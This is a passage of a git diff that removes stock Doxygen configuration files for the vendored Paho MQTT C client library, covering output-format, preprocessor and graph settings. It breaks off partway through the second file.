-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             = __attribute__(x)=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = YES
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI.in b/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI.in
deleted file mode 100644
index 482542f..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI.in
+++ /dev/null
@@ -1,1804 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "Paho MQTT C Client Library"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "@PROJECT_SOURCE_DIR@/doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "@CMAKE_CURRENT_BINARY_DIR@/doc/MQTTClient/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = /Users/dimitri/doxygen/mail/1.5.7/doxywizard/
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = NO
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
